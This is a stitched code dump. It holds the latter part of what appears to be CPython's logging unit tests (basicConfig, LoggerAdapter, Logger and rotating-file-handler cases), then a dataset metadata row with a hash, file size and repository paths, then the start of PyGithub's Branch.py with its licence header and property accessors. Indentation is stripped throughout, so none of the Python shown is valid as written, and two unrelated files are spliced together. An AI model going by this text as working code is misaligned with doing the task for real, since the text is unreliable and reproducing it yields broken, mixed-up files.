self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1)
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5:
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
| true | true |
f723301c992529f6902bb52d24c8d1d5b8a2c80b | 23,884 | py | Python | github/Branch.py | aantr/WindowsHostManager | 75d248fc8991d471c6802fa79e7dee44a5708c65 | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2021-06-25T09:13:12.000Z | 2021-06-25T09:13:12.000Z | venv/lib/python3.6/site-packages/github/Branch.py | rongshaoshuai/blogs | dafeb789428436c1ec8069e605400612b776b8f2 | [
"MIT"
] | 3 | 2021-03-30T23:03:03.000Z | 2021-03-30T23:06:57.000Z | lib/github/Branch.py | Corionis/Knobs-And-Scripts | 81a954fd0ed697e5759359ec0383a3f16a841143 | [
"MIT"
] | null | null | null | ############################ Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 AKFish <akfish@gmail.com> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2013 martinqt <m.ki2@laposte.net> #
# Copyright 2014 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2015 Kyle Hornberg <khornberg@users.noreply.github.com> #
# Copyright 2016 Jannis Gebauer <ja.geb@me.com> #
# Copyright 2016 Peter Buckley <dx-pbuckley@users.noreply.github.com> #
# Copyright 2018 Steve Kowalik <steven@wedontsleep.org> #
# Copyright 2018 Wan Liuyang <tsfdye@gmail.com> #
# Copyright 2018 sfdye <tsfdye@gmail.com> #
# #
# This file is part of PyGithub. #
# http://pygithub.readthedocs.io/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
import github.BranchProtection
import github.Commit
import github.GithubObject
import github.RequiredPullRequestReviews
import github.RequiredStatusChecks
from . import Consts
class Branch(github.GithubObject.NonCompletableGithubObject):
"""
This class represents Branches. The reference can be found here https://developer.github.com/v3/repos/branches
"""
def __repr__(self):
return self.get__repr__({"name": self._name.value})
@property
def commit(self):
"""
:type: :class:`github.Commit.Commit`
"""
return self._commit.value
@property
def name(self):
"""
:type: string
"""
return self._name.value
@property
def protected(self):
"""
:type: bool
"""
return self._protected.value
@property
def protection_url(self):
"""
:type: string
"""
return self._protection_url.value
